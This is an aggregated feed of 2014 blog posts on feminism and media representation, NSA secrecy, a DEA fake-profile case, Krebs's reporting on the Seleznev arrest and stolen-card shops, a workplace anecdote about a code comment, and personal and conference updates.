    Read more about TEDx organizers. And stay tuned for a slew of upcoming events on Cyprus this November. TEDxNicosia will be held on November 1; TEDxUniversityofNicosia on November 15, and TEDxYouth@Nicosia on November 16.

    The stage at TEDxNicosiaWomen. Photo: Andri Josef/AJPhotoart

    The stage at TEDxNicosiaWomen. Photo: Andri Josef/AJPhotoart


    Sociological ImagesIs This #HeForShe Video Helping Feminism?

    The United Nations’ #HeForShe campaign had a fantastic launch, with Emma Watson’s impassioned speech deservedly going viral. She stood up and described how everyday sexism continues to discourage girls and women from being strong, physical, and outspoken. And she defended the “feminist” label as a simple demand for sexual equality. But most importantly, she called for solidarity between men and women in achieving it.

    And then this video came out:

    <object height="315" width="560"><param name="movie" value="//;hl=en_US"/><param name="allowFullScreen" value="true"/><param name="allowscriptaccess" value="always"/><embed allowfullscreen="true" allowscriptaccess="always" height="315" src="//;hl=en_US" type="application/x-shockwave-flash" width="560"></object>

    On the surface, it looks like a group of men from all walks of life answering Ms. Watson’s call. But delve deeper, and it becomes problematic. For me, anyway.

    I’m a man, and I consider myself a feminist. But when I think about working towards an end to sexism, the last thing I would do is get a group of men to discuss the issue isolated from women. And yet that’s what this video seems to be trying to do.

    It feels like a male encounter group, but obviously highly scripted. The different men describe their commitment to #HeForShe in terms of protective paternalistic stereotypes (“I can’t let my daughters, or my wife, suffer because I didn’t do MY job”) and entitlement (“If we don’t change it, it’s never gonna change.”)

    I realize that men have to be part of the solution, but this video feels like it is saying that men ARE the solution. As if a bunch of bros getting together to share their feelings are going to solve sexism, with no reference to how sisters have been doing it for themselves for over 200 years. They don’t need a heroic male takeover of the women’s movement that helps us all feel proud of ourselves because we are “#NotAllMen.” They need real understanding and support.

    Am I being too harsh? Maybe. But when the one man says, “Understand that it’s not only speaking out FOR women, but WITH women” to a sausage fest, the irony speaks volumes to me.

    I think #HeForShe is a great idea, “a solidarity movement for gender equality that brings together one half of humanity in support of the other of humanity, for the entirety of humanity.”

    So why can’t we do it together? Are men considered to be so sexist already that we need to find a “manly” way to be feminist?

    Here’s an idea: Talk to women about the issue. But more importantly, listen to them about what they experience. There is far more work for us to do together.

    Tom Megginson is a Creative Director at Acart Communications, a Canadian Social Issues Marketing agency. He is a specialist in social marketing, cause marketing, and corporate social responsibility. You can follow Tom at Osocio, where this post originally appeared, and The Ethical Adman Work That Matters.

    (View original at

    RacialiciousBlackface by Another Name? “Painting Down” on Gotham

    The issues for people of color in Hollywood run deep – so much so that we occasionally forget how invested the industry can be in denying opportunities to enter this business.

    Jada Pinkett Smith landed a coveted role on the show as Fish Mooney, a female mob leader:

    GOTHAM: Jada Pinkett Smith as Fish Mooney in the "Selina Kyle" episode of GOTHAM airing Monday, Sept. 29 (8:00-9:00 PM ET/PT) on FOX. ©2014 Fox Broadcasting Co. Cr: Jessica Miglio/FOX

    So we have a black woman on screen in a major role. But what is happening behind the scenes? Are people of color being represented in other parts of the industry, like doing stunt work? Not so, according to Deadline Hollywood:

    After receiving inquiries from Deadline, Warner Bros. has canceled plans to “paint down” a white stunt woman to double for a black actress on its hit Fox show Gotham. On Monday, dark makeup was applied to the face of a white stunt woman in a hair and makeup test in advance of two days of filming next week in New York. After receiving calls from Deadline, WB initially downplayed the significance of the story, but after looking into it said that it had made a “mistake” and would hire a black stunt woman instead.


    Deadline continues:

    “Painting down” white stunt performers so that they can pass for black has been going on for decades, even though SAG-AFTRA calls the practice “unacceptable” and “improper.” Blackface went out in the 1930s, but “painting down” white stunt performers goes on to this day, and there is no language in the union’s contract that expressly prohibits it. The union’s contract only requires that stunt coordinators “endeavor” to find stunt performers of the same race and gender as the actors they are doubling. For many black cast and crew members, however, the practice is insulting and demeaning, a holdover from Hollywood’s openly racist past.

    Was the industry so lacking in black talent that it was easier to paint a white woman than hire a black stuntwoman?

    A few minutes of googling netted me a documentary by La Faye Baker about black stunt women in Hollywood:

    <iframe allowfullscreen="allowfullscreen" frameborder="0" height="315" src="" width="560"></iframe>

    Is it because the women featured there aren’t high profile enough?
    The Stuntwomen’s Association of Motion Pictures has three black women on the front page: Nicole Callender,
    Jwaundace Candece and Kelsee L. King Devoreaux.

    No blockbuster experience? Angela Meryl put in work on the sets of Kill Bill, Skyfall, American Gangster, and Pirates of the Caribbean: At World’s End.

    Warner Brothers said:

    “A mistake was made this week in casting a stunt woman for a guest star in a particular scene on the show. The situation has been rectified, and we regret the error.”

    We regret this whole situation.

    The post Blackface by Another Name? “Painting Down” on Gotham appeared first on Racialicious - the intersection of race and pop culture.

    Sociological ImagesHappy Birthday, Louis Althusser!

    Image borrowed from BHL.

    Have a scholar we should commemorate?  Send us a wacky pic and we will!

    Lisa Wade is a professor of sociology at Occidental College and the co-author of Gender: Ideas, Interactions, Institutions. You can follow her on Twitter and Facebook.

    (View original at

    CryptogramNSA Classification ECI = Exceptionally Controlled Information

    ECI is a classification above Top Secret. It's for things that are so sensitive they're basically not written down, like the names of companies whose cryptography has been deliberately weakened by the NSA, or the names of agents who have infiltrated foreign IT companies.

    As part of the Intercept story on the NSA's using agents to infiltrate foreign companies and networks, it published a list of ECI compartments. It's just a list of code names and three-letter abbreviations, along with the group inside the NSA that is responsible for them. The descriptions of what they all mean would never be in a computer file, so it's only of value to those of us who like code names.

    This designation is why there have been no documents in the Snowden archive listing specific company names. They're all referred to by these ECI code names.

    Planet Linux AustraliaAndrew Pollock: [life] Day 260: Bedwetting, a morning tea play date, and swim class

    Zoe woke up at something like 3:30am because she'd wet the bed. She hasn't wet the bed since before she turned 4. In fact, I bought a Connie pad and she promptly never wet the bed again. I was actually thinking about stopping using it just last night, so I obviously jinxed things.

    Anyway, she woke up, announced she'd had an accident, and I smugly thought I'd have it all handled, but alas, the pad was too low down, so she'd still managed to wet the mattress, which was annoying. Plan B was to just switch her to the bottom bunk, which still worked out pretty well. I've learned an important lesson about the placement of the Connie pad now.

    Unfortunately for me, it seems that if I get woken up after about 4am, I have a low probability of getting back to sleep, and I'd gotten to bed a bit late the night before, so I only wound up with about 5 hours and felt like crap all day.

    Vaeda and her mum, Francesca came over for a morning tea play date. I'd been wanting an excuse to try out a new scone recipe that I'd discovered, so I cranked out some scones for morning tea.

    Vaeda and Francesca couldn't stay for too long, but it was a nice morning nonetheless. Then we popped out to Woolworths to pick up a $30 gift card that the store had donated towards the weekend sausage sizzle. Not quite 70 kg of free sausages, but better than nothing.

    After we got back, we had some lunch, and I tried to convince Zoe to have a nap with me, without success, but we did have a couple of hours of quietish time, and I got to squeeze in some reading.

    We biked over to swim class and then biked home, and I made dinner. Zoe was pretty tired, so I got her to bed nice and easily. It'll be an early night for me too.

    Worse Than FailureA Stupid Comment

    Paul worked for a branch of the Defence Department in Australia, writing reams of C++ using the standard template libraries on a Linux box. On a typical afternoon, Paul checked some code into CVS with a comment:

    Fixed bug 7551, see issue report 2119. Tinky Winky is my favourite Teletubby.

    The addendum continued a long-running inside joke. At this point, the weird check-in comments were only funny because they were applied so consistently.

    “Hey Paul, come over here a second!”

    Paul’s friend and fellow developer Stan had initiated an impromptu gathering around his desk. Once Paul joined the huddle, Stan turned back to his computer screen. “I’m getting sick of these warning messages. You know, the ones our compiler throws because our namespace names are longer than 256 characters? I have trouble finding the real errors around these things. Do any of you know how to shut them off?”

    What a Tinky Winky might look like
    Paul also has a lovely red purse.

    “I do,” Paul said. “Here, let me show you what I’ve done.”

    Paul supplied the name of a header file he’d been working on recently, then pointed to a line near the top. “See that pragma statement? It’ll suppress those warnings during compile time.”

    // We don&apost need these stupid warning messages PMJ
    #pragma warning( disable : 4507 34 )

    “Oh, cool. I’ll try that,” Stan said. “Thanks, Paul!”

    Life went on.

    The trouble started a few weeks later, during a code review. Paul was asked to attend as an impartial reviewer for a project he had no involvement with. When he sat down in the meeting room, Burt the project manager was already there, giving him narrowed eyes.

    “Paul,” Burt began, “are your initials PMJ?”

    Paul frowned. “Yes… why?”

    “The research scientists on my team are complaining that the word ‘stupid’ appears at the start of almost every header file.”

    “What does this have to do with me?” Paul asked.

    “Well, you’ve been touching all this code.” Burt brought up a Word document on his laptop, which was projected onto a screen in the meeting room. “I compiled some samples the scientists showed me. This right here, for instance…”

    Paul blinked at the offending screenshot, which displayed the following two lines:

    // We don&apost need these stupid warning messages PMJ
     #pragma warning( disable : 4507 34 )

    “Oh! That’s just code for suppressing warning messages during compile time,” Paul said. “I wasn’t the one who put it in here. One of the other developers must’ve copied and pasted it in wholesale.”

    “‘Stupid?’” Burt demanded and accused all at once.

    “That’s just a comment. It doesn’t actually do anything.”

    “It makes the scientists angry,” Burt snapped. “It’s inappropriate- and it’s everywhere! They’re questioning the entire code base and the quality of our in-house software! I think we should take this offline for further discussion.” His glowering lifted as more project members filtered into the room for the code review.

    A few days later, Paul was roped into a meeting with Burt, his own boss, and a very offended research scientist.

    “Stupid! Do you think national defense is stupid?” the scientist fumed. “Do you think I’m too stupid not to notice? What good is the code in that stupid file, anyway?”

    “I didn’t touch all those files,” Paul tried to explain.

    “You initialed every line!” the scientist cried.

    “Check CVS. I wasn’t the one checking in those changes!” Paul returned. “And who cares anyway, it’s just a stupid comment! It doesn’t do anything!”

    “Again with the stupid! It reflects an attitude that is rude and demoralizing. How would you like it if I called your work stupid? Oh wait, I see you already did!”

    “Let’s calm down here,” Paul’s boss intervened. “Paul, you said it’s a comment, right? Taking it out won’t change the behavior?”

    “No, course not.”

    “Well, then that means it’d be no problem for you to remove the word ‘stupid’ wherever it appears in the code base- right?” His boss smiled with the glow of a self-assured master diplomat.

    It turned out Paul’s fellow developers had copied the warning suppression code to hundreds of files. Paul wrote a shell script that nuked all occurrences of the offending word and his initials, which he ran during a couple of code base merges when he had everything checked out.

    Disaster averted- or so Paul thought. Paul’s boss reared his head again a few days later, frowning. “Is Tinky Winky really your favorite Teletubby? If you think you had too many meetings about ‘stupid’, think about how many I had. You’d better edit the log.”


    LongNowHow We Got To Now: new PBS show starring Steven Johnson

    <iframe allowfullscreen="" frameborder="0" height="315" src="" width="560"></iframe>

    Tonight, October 15th 02014, former SALT Speaker Steven Johnson’s new TV series premieres on PBS. The show, “How We Got To Now”, is co-produced by PBS and BBC, and focuses on different themes showing how long cumulative efforts can result in massive systemic change. The first of the six episodes, “Clean”, focuses on how sanitary conditions evolved from concept to reality, and how this reality affects public health and entire industries.

    9781846148606Steven Johnson has worked on many different topics throughout his career, and he draws on all of these topics in this series. However, it is his study of the history of technology that anchors the show. One of Steven’s major contributions to this field is popularizing network-based approaches to understanding history and new technologies. For example, to understand the lightbulb, one needs to look beyond Thomas Edison and understand the environmental conditions, contemporaneous technologies, and networks of scientists corresponding across the globe. Once these factors are taken into account, innovation stops looking like “eureka moments” and instead becomes anchored in effective networks, collaborations, and the slow incubation of ideas. In the following animation, Steven Johnson explains this process and how it can help us think about technology and innovation now:

    <iframe allowfullscreen="" frameborder="0" height="315" src="" width="560"></iframe>

    Check your local listings to watch “How We Got To Now”, and keep a look out for some Long Now references throughout the series.

    Planet Linux News: Speaker Feature: John Dickinson, Himangi Saraogi

    John Dickinson

    John Dickinson

    Herding Cats: Getting an open source community to work on the same thing.

    2:15pm Thursday 15th January 2015

    John is a familiar sight around the world, he has spoken at many conferences, summits, and meetups, including the OpenStack Summit, OSCON, and LinuxConf Australia.

    He is Director of Technology at SwiftStack. SwiftStack is a technology innovator of private cloud storage for today s applications, powered by OpenStack Object Storage.

    For more information on John and his presentation, see here. You can follow him as @notmyname and don’t forget to mention #lca2015.

    Himangi Saraogi

    Himangi Saraogi

    Coccinelle: A program matching and transformation tool

    1:20pm Wednesday 14th January 2015

    Himangi finds contributing to open source a great learning platform and she herself has been contributing to Linux kernel and has submitted and had many patches accepted.

    She has experience with tools like checkpatch, sparse and coccinelle.

    For more information on Himangi and her presentation, see here. You can follow her as @himangi99 and don’t forget to mention #lca2015.

    Krebs on SecuritySeleznev Arrest Explains ‘2Pac’ Downtime

    The U.S. Justice Department has piled on more charges against alleged cybercrime kingpin Roman Seleznev, a Russian national who made headlines in July when it emerged that he’d been whisked away to Guam by U.S. federal agents while vacationing in the Maldives. The additional charges against Seleznev may help explain the extended downtime at an extremely popular credit card fraud shop in the cybercrime underground.

    The 2pac[dot]cc credit card shop.

    The 2pac[dot]cc credit card shop.

    The government alleges that the hacker known in the underground as “nCux” and “Bulba” was Roman Seleznev, a 30-year-old Russian citizen who was arrested in July 2014 by the U.S. Secret Service. According to Russian media reports, the young man is the son of a prominent Russian politician.

    Seleznev was initially identified by the government in 2012, when it named him as part of a conspiracy involving more than three dozen popular merchants on carder[dot]su, a bustling fraud forum where Bulba and other members openly marketed various cybercrime-oriented services (see the original indictment here).

    According to Seleznev’s original indictment, he was allegedly part of a group that hacked into restaurants between 2009 and 2011 and planted malicious software to steal card data from store point-of-sale devices. The indictment further alleges that Seleznev and unnamed accomplices used his online monikers to sell stolen credit and debit cards at bulba[dot]cc and track2[dot]name. Customers of these services paid for their cards with virtual currencies, including WebMoney and Bitcoin.

    But last week, U.S. prosecutors piled on another 11 felony counts against Seleznev, charging that he also sold stolen credit card data on a popular carding store called 2pac[dot]cc. Interestingly, Seleznev’s arrest coincides with a period of extended downtime on 2pac[dot]cc, during which time regular customers of the store could be seen complaining on cybercrime forums where the store was advertised that the proprietor of the shop had gone silent and was no longer responding to customer support inquiries.

    A few weeks after Seleznev’s arrest, it appears that someone new began taking ownership of 2pac[dot]cc’s day-to-day operations. That individual recently posted a message on the carding shop’s home page apologizing for the extended outage and stating that fresh, new cards were once again being added to the shop’s inventory.

    The message, dated Aug. 8, 2014, explains that the proprietor of the shop was unreachable because he was hospitalized following a car accident:

    “Dear customers. We apologize for the inconvenience that you are experiencing now by the fact that there are no updates and [credit card] checker doesn’t work. This is due to the fact that our boss had a car accident and he is in hospital. We will solve all problems as soon as possible. Support always available, thank you for your understanding.”

    2pac[dot]cc's apologetic message to would-be customers of the credit card fraud shop.

    2pac[dot]cc’s apologetic message to would-be customers of the credit card fraud shop.


    2pac is but one of dozens of fraud shops selling stolen debit and credit cards. And with news of new card breaches at major retailers surfacing practically each week, the underground is flush with inventory. The single most important factor that allows individual card shop owners to differentiate themselves among so much choice is providing excellent customer service.

    Many card shops, including 2pac[dot]cc, try to keep customers happy by including an a-la-carte card-checking service that allows customers to test purchased cards using compromised merchant accounts — to verify that the cards are still active. Most card shop checkers are configured to automatically refund to the customer’s balance the value of any cards that come back as declined by the checking service.

    This same card checking service also is built into rescator[dot]cc, a card shop profiled several times in this blog and perhaps best known as the source of cards stolen from the Target, Sally Beauty, P.F. Chang’s and Home Depot retail breaches. Shortly after breaking the news about the Target breach, I published a lengthy analysis of forum data that suggested Rescator was a young man based in Odessa, Ukraine.

    Turns out, Rescator is a major supplier of stolen cards to other, competing card shops, including swiped1[dot]su — a carding shop that’s been around in various forms since at least 2008. That information came in a report (PDF) released today by Russian computer security firm Group-IB, which said it discovered a secret way to view the administrative statistics for the swiped1[dot]su Web site. Group-IB found that a user named Rescator was by far the single largest supplier of stolen cards to the shop, providing some 5,306,024 cards to the shop over the years.

    Group-IB also listed the stats on how many of Rescator’s cards turned out to be useful for cybercriminal customers. Of the more than five million cards Rescator contributed to the shop, only 151,720 (2.8 percent) were sold. Another 421,801 expired before they could be sold. A total of 42,626 of the 151,720 — or about 28 percent – of Rescator’s cards that were sold on Swiped1[dot]su came back as declined when run through the site’s checking service.

    The swiped1[dot]su login page.

    The swiped1[dot]su login page.

    Many readers have asked why the thieves responsible for the card breach at Home Depot collected cards from Home Depot customers for five months before selling the cards (on Rescator’s site, of course). After all, stolen credit cards don’t exactly age gracefully or grow more valuable over time.

    One possible explanation — supported by the swiped1[dot]su data and by my own reporting on this subject — is that veteran fraudsters like Rescator know that only a tiny fraction of stolen cards actually get sold. Based on interviews with several banks that were heavily impacted by the Target breach, for example, I have estimated that although Rescator and his band of thieves managed to steal some 40 million debit and credit card numbers in the Target breach, they likely only sold between one and three million of those cards.

    The crooks in the Target breach were able to collect 40 million cards in approximately three weeks, mainly because they pulled the trigger on the heist on or around Black Friday, the busiest shopping day of the year and the official start of the holiday shopping season in the United States. My guess is that Rescator and his associates understood all too well how many cards they needed to steal from Home Depot to realize a certain number of sales and monetary return for the heist, and that they kept collecting cards until they had hit that magic number.

    For anyone who’s interested, the investigation into swiped1[dot]su was part of a larger report that Group-IB published today, available here.

    Sociological ImagesHow (Some) Economists Are Like Doomsday Cult Members

    Four years ago, twenty-three economists (mostly conservative) signed a letter to Ben Bernanke warning that the Fed’s quantitative easing policy – adding billions of dollars to the economy – would be disastrous. It would “debase the currency,” create high inflation, distort financial markets, and do nothing to reduce unemployment.

    Four years later, it’s clear that they were wrong (as Paul Krugman never tires of reminding us). Have they changed their beliefs?

    Of course not.

    Bloomberg asked the letter-signers what they now thought about their prophecy.  Here’s the headline: “Fed Critics Say ’10 Letter Warning Inflation Still Right.”
    This despite the actual low inflation:

    I don’t know why I assume that high-level economists would be more likely than some ordinary people to change their ideas to adjust for new facts. Fifty years ago, in The Structure of Scientific Revolutions, Thomas Kuhn showed that even in areas like chemistry and physics, scientists cling to their paradigms even in the face of accumulated anomalous facts. Why should big-shot economists be any different? It also occurs to me that it’s the most eminent in a profession who will be more resistant to change.  After all, it’s the people at the top who have the greatest amount invested in their ideas – publications, reputations, consultantships, and of course ego. Economists call these “sunk costs.”

    So how do they maintain their beliefs?

    Most of the 23 declined to comment; a few could not be reached (including Ronald McKinnon, who died the previous day).  Of those who responded, only one, Peter Wallison at the American Enterprise Institute, came close to saying, “My prediciton was wrong.”

    “All of us, I think, who signed the letter have never seen anything like what’s happened here.”

    Most of the others preferred denial:

    “The letter was correct as stated.” (David Malpass. He worked in Treasury under Reagan and Bush I)

    “The letter mentioned several things… and all have happened.” (John Taylor, Stanford)

    “I think there’s plenty of inflation — not at the checkout counter, necessarily, but on Wall Street.” (Jim Grant of “Grant’s Interest Rate Observer.” Kinda makes you wonder how closely he’s been observing interest rates.)

    Then there was equivocation. After Thursday night’s debacle – Giants 8, Pirates 0, knocking Pittsburgh out of the playoffs– someone reminded me, “Hey, didn’t you tell me that the Pirates would win the World Series?”

    “Yes, but I didn’t say when.”

    Some of the letter-signers used this same tactic, and just about as convincingly.

    “Note that word ‘risk.’ And note the absence of a date.” (Niall Ferguson, Harvard)

    “Inflation could come…” (Amity Shlaes, Calvin Coolidge Memorial Foundation)

    The 1954 sociology classic When Prophecy Fails describes group built around a prediction that the world would soon be destroyed and that they, the believers, would be saved by flying saucers from outer space.  When it didn’t happen, they too faced the problem of cognitive dissonance – dissonance between belief and fact. But because they had been very specific about what would happen and when it would happen, they could not very well use the  denial and equivocation favored by the economists. Instead, they first by claimed that what had averted the disaster was their own faith. By meeting and planning and believing so strongly in their extraterrestrial rescuers, they had literally saved the world. The economists, by contrast, could not claim that their warnings saved us from inflation, for their warning – their predictions and prescriptions – had been ignored by Fed. So instead they argue that there actually is, or will be, serious inflation.

    The other tactic that the millenarian group seized on was to start proselytizing – trying to convert others and to bring new members into the fold.  For the conservative economists, this tactic is practically a given, but it is not necessarily a change.  They had already been spreading their faith, as professors and as advisors (to policy makers, political candidates, wealthy investors, et al.). They haven’t necessarily redoubled their efforts, but the evidence has not given them pause.  They continue to publish their unreconstructed views to as wide an audience as possible.

    That’s the curious thing about cognitive dissonance. The goal is to reduce the dissonance, and it really doesn’t matter how.  Of course, you could change your ideas, but letting go of long and deeply held ideas when the facts no longer co-operate is difficult. Apparently it’s easier to change the facts (by denial, equivocation, etc.). Or, equally effective in reducing the dissonance, you can convince others that you are right. That validation is just as effective as a friendly set of facts, especially if it comes from powerful and important people and comes with rewards both social and financial.

    Jay Livingston is the chair of the Sociology Department at Montclair State University. You can follow him at Montclair SocioBlog or on Twitter.

    (View original at

    RacialiciousMy Fair Selfie?

    by Guest Contributor Deepa

    Hi, my name is Deepa, and I’m excited to be reviewing ABC’s new fall show Selfie for you!

    When I first heard the premise of Selfie, I was pretty skeptical. It was billed as a modern-day version of the musical My Fair Lady, a story that is very much of a specific time and place. Set in London in the early 1910s, the musical (based on George Bernard Shaw’s play Pygmalion) is the story of Eliza Doolittle, a working-class woman who wants to improve her circumstances.

    Enter Professor Henry Higgins, who is one of those unashamedly arrogant and misogynistic assholes that all of us have met at some point. By virtue of his apparent brilliance in the field of phonetics, Eliza decides he is the only one who can help her lose Cockney accent, which, Higgins says, is what truly ties her to her class. With the help of his friend Colonel Pickering (a much more chivalrous but no less patronizing gentleman), Higgins teaches Eliza not only to speak differently, but to conduct herself in high society. But when I found out that the Henry Higgins character would be portrayed not only by a person of color, but by John Cho, I decided I wanted to give it a try.

    Some of my initial uncertainty may have come from the fact that I am a huge My Fair Lady fan. Growing up in the Pacific Northwest region of the United States, I was a first-gen kid with proudly progressive Indian parents. My mom, in particular, grew up in the Indian state of Kerala, which historically had a matrilineal society, and her family prioritized education and career for their sons and daughters. I was raised to be strongly feminist and anti-racist, and to confront my own socioeconomic and educational privilege. And I was also fortunate enough to be surrounded by people who mostly felt the same way.

    As such, my first exposure to overt sexism and classism came from the film version of My Fair Lady, which I’ve loved since I was four years old.

    My Fair Lady is also an obvious product of imperialist Britain. The movie appears to take place in that mythical all-white London that we’ve been shown so many times in popular culture.

    Most of the obvious prejudice relates to class or to the other nationalities within the United Kingdom. There are a few throw- away references to other countries that are casually racist: for one the lyric in “Why Can’t the English?” that the Arabians learn Arabian/which is absolutely frightening – does a phoneticist really not know the language is Arabic?

    And of course there is the fact that Colonel Pickering has just returned from India where, he says, he has been studying their “147 distinct dialects”. Even as a child, I used to yell at the screen that India has thousands of distinct languages let alone dialects, get your facts right, Pickering.

    And yet, it is a film that is beloved to many South Asians that I know, despite racist undertones, because Eliza Doolittle is such a compelling character – and Henry Higgins, while deplorable, is a fascinating foil for her.

    So while Selfie purports to be a modern-day American version of My Fair Lady, it’s not only the time period that is drastically different.

    The show begins by introducing Eliza Dooley (Karen Gillan), who fled from memories of childhood bullying by reinventing herself on social media. Unfortunately, the fix is superficial: she is widely “liked” on Instagram, Facebook, and other forms of social media, but she has no real friends.

    In the opening scene, Eliza, embarrasses herself in front of a plane full of her coworkers when she a) finds out that her office “boyfriend” is in fact a married man, b) throws up into two barf bags in shock, c) gets covered with vomit when the bags break on her way to the bathroom, and d) emerges wearing strategically-wrapped airplane blankets instead of clothing. After her public humiliation, Eliza comes upon a solution to make her way back up from rock bottom.

    At Eliza’s job, the morning staff meeting is all about celebrating the work of marketing genius Henry Higgins (John Cho), who managed to take company’s pediatric nasal spray, which (allegedly!) caused Satanic hallucinations, and successfully rebrand it. Easily my favorite character in this scene is the gleeful and wildly inappropriate CEO (David Harewood), who smacks a kiss onto Henry’s lips (CEO: “You know, I read an article that said Asian men are more comfortable kissing on the lips as a sign of friendship.” What?) and invites Henry to his daughter’s wedding that weekend, asking him to bring a date because “you’re always alone, it’s kind of weird.”

    In my head, John-Cho-as-Henry starts defiantly singing “I’d prefer a new edition of the Spanish Inquisition than to ever let a woman in my life!” but sadly this does not happen.

    Henry returns to his office to find Eliza there with a proposition: if he can rebrand a dangerous pharmaceutical product, can’t he help her change her image? “What,” Henry replies, “you mean be a better person?”

    “Or that,” says Eliza.

    Henry agrees to the challenge of trying to “repackage” Eliza (possibly a reference to My Fair Lady’s Higgins frequently calling Eliza Doolittle “baggage”?), and so the lessons begin. The first: for Eliza to greet the office’s receptionist, Charmonique, and ask her about her day. Note that in an earlier scene, we don’t see Henry take any particular notice of Charmonique either, but all that doesn’t matter!
    Not when this is a perfect opportunity to mansplain common decency to Eliza!

    Charmonique is clearly used to these kinds of micro-aggressions, which she most likely faces frequently as a woman of color working as a receptionist in this office, and when Eliza can’t even remember her name she seems at first to take pity on her. But even Charmonique is rightly upset when Eliza adds, “In my defense, that’s not a real name.” Wonderful, Eliza, that’s totally not an offensive racial stereotype or anything!

    Of course, Henry’s next instruction takes the form of a “test” for Eliza: accompany him to their CEO’s daughter’s wedding, to see if she can behave herself in a social setting. There’s a predictable make under to get Eliza ready for the wedding, which she predictably screws up by making noises on her phone to distract herself from the genuine emotion of the ceremony – as, we learn through a flashback, Eliza has been doing since she was an unpopular child.

    After everyone else has left the church, Henry and Eliza have it out. Henry doesn’t understand why Eliza would embarrass herself and him with such an obvious social faux pas, and he thinks he’s made a huge mistake by offering to help her. Eliza counters that maybe she’s the one who’s been helping him, since he didn’t even have a date for this wedding before he asked her. She then tells him exactly what she thinks of him: that he’s anti-social and holier-than-thou and un-fun, and at one point she even calls him a cockscomb. (John Cho’s hurt face when she calls him un-fun is my favorite thing in the entire episode.)

    “Oh, I’m a cockscomb, am I?” says Henry. “Well, you, my dear, are a
    lost cause.”

    And after storming out, it looks like both of them are ready to give up on the entire venture. But the next day at work, Eliza finds herself having a friendly conversation with Charmonique as if it’s completely natural, a conversation that has nothing to do with Eliza herself. “Whatever you’re doing with Mr. Man, it’s working,” says Charmonique.

    So Eliza goes to Henry’s house to apologize, and to explain that she hadn’t been on her phone from boredom, but because the wedding gave her feels (“Feels?” says a bewildered Henry, and I agree) that she wanted to suppress. And despite the scene playing out pretty much exactly as you’d expect – there’s even some gallivanting around in the rain to show how much Eliza and Henry are making a real connection – it’s still cute, and feels genuine enough to actually be the start of a wonderful friendship, or at least something close to it.

    Selfie started to confuse me a little with its My Fair Lady parallels, or lack thereof – because My Fair Lady is a story about changing a person’s outward behavior and mannerisms rather than looking inward.

    Sure, Higgins and Pickering think they are improving Eliza Doolittle’s character along with her elocution, but it’s clear that their perspectives come from their overweening class privilege. To them even the façade of a well-mannered and well-spoken lady is of more substance than the reality of a common flower girl. (Not that Higgins has much esteem for even the most respectable of women.)

    What has always kept My Fair Lady in a different category from the She’s All That rom-com formula is that, at the end of the story, neither Eliza nor Higgins have been substantially changed by each other.

    By the end, Eliza realizes that the process of “becoming a lady” may have even diminished her own personality and freedom, but she’s determined not to let that continue. Higgins’s heart is perhaps a little softened by Eliza’s influence, but really, just a very, very little – he’s still a snob and an unapologetic asshole. It’s a story about trying to use the tools of a rule-obsessed society against the very class that wields them. And in that aim, it’s a story with an ambiguous ending.

    So it’ll be interesting to see how Selfie interprets the original Henry Higgins – who knows the rules of his society but has enough privilege to get away with flouting them himself, and who definitely does not know much about being a good person – into this modern version, who “finds it rather easy not to form personal connections in a city that only values wireless connection”, whose curmudgeonly behavior seems to be because he’s written off modern American society as narcissistic and shallow.

    Is Selfie going to flip the original premise and go the simplistic-but-heartwarming route, trying to make the modern Eliza and Henry both “better people” who discover their “true selves” through their friendship (or maybe more)? Or is it going to be more complex than that?

    Hopefully, the fact that the cast features a number of actors of color will help add to that complexity.

    To take the character of Henry Higgins, who is the very definition of privilege in My Fair Lady (see, again, the song “I’m An Ordinary Man”, in which Higgins explains that all he expects from life is to be able to do whatever he wants, regardless of how it affects anyone else) and to take away or twist some of that privilege – it could turn out to be very interesting. The mere fact that John Cho is playing a rom-com lead in a sitcom not focused on race or ethnicity is groundbreaking – particularly since Asian men are often desexualized in popular culture. We’ll see if that gets addressed in ways that are less awkwardly humorous in the future (though “Kissing Koreans: Greenlight!” is a hilarious headline).

    I have similar hopes for black CEO Sam Saperstein, who is married to a white woman, and whose biracial daughter is marrying a white man, without comment – and Charmonique, who stole every scene she was in.

    Sitcoms tend to deal one of two ways with race – either offensively, or with willful “color-blindness” – but I think Selfie might be able to find a middle-ground instead.

    The post My Fair Selfie? appeared first on Racialicious - the intersection of race and pop culture.

    Planet Linux AustraliaBen Martin: Sliding around... spinning around.

    The wiring and electronics for the new omniwheel robot are coming together nicely. Having wired this up using 4 individual stepper controllers, one sees the value in commissioning a custom base board for the stepper drivers to plug into. I still have to connect an IMU to the beast, so precision strafing will (hopefully) be obtainable. The sparkfun mecanum video has the more traditional two wheels each side design, but does wobble a bit when strafing.

    Apart from the current requirements the new robot is also really heavy, probably heavier than Terry. I'm still working out what battery to use to meet the high current needs of four reasonable steppers on the move.

    CryptogramDEA Sets Up Fake Facebook Page in Woman's Name

    This is a creepy story. A woman has her phone seized by the Drug Enforcement Agency and gives them permission to look at her phone. Without her knowledge or consent, they steal photos off of the phone (the article says they were "racy") and use it to set up a fake Facebook page in her name.

    The woman sued the government over this. Extra creepy was the government's defense in court: "Defendants admit that Plaintiff did not give express permission for the use of photographs contained on her phone on an undercover Facebook page, but state the Plaintiff implicitly consented by granting access to the information stored in her cell phone and by consenting to the use of that information to aid in an ongoing criminal investigations [sic]."

    The article was edited to say: "Update: Facebook has removed the page and the Justice Department said it is reviewing the incident." So maybe this is just an overzealous agent and not official DEA policy.

    But as Marcy Wheeler said, this is a good reason to encrypt your cell phone.

    CryptogramFOXACID Operations Manual

    A few days ago, I saw this tweet: "Just a reminder that it is now *a full year* since Schneier cited it, and the FOXACID ops manual remains unpublished." It's true.

    The citation is this:

    According to a top-secret operational procedures manual provided by Edward Snowden, an exploit named Validator might be the default, but the NSA has a variety of options. The documentation mentions United Rake, Peddle Cheap, Packet Wrench, and Beach Head-­all delivered from a FOXACID subsystem called Ferret Cannon.

    Back when I broke the QUANTUM and FOXACID programs, I talked with the Guardian editors about publishing the manual. In the end, we decided not to, because the information in it wasn't useful to understanding the story. It's been a year since I've seen it, but I remember it being just what I called it: an operation procedures manual. It talked about what to type into which screens, and how to deal with error conditions. It didn't talk about capabilities, either technical or operational. I found it interesting, but it was hard to argue that it was necessary in order to understand the story.

    It will probably never be published. I lost access to the Snowden documents soon after writing that essay -- Greenwald broke with the Guardian, and I have never been invited back by the Intercept -- and there's no one looking at the documents with an eye to writing about the NSA's technical capabilities and how to securely design systems to protect against government surveillance. Even though we now know that the same capabilities are being used by other governments and cyber criminals, there's much more interest in stories with political ramifications.

    Planet Linux AustraliaAndrew Pollock: [life] Day 259: Kindergarten, more demos and play dates

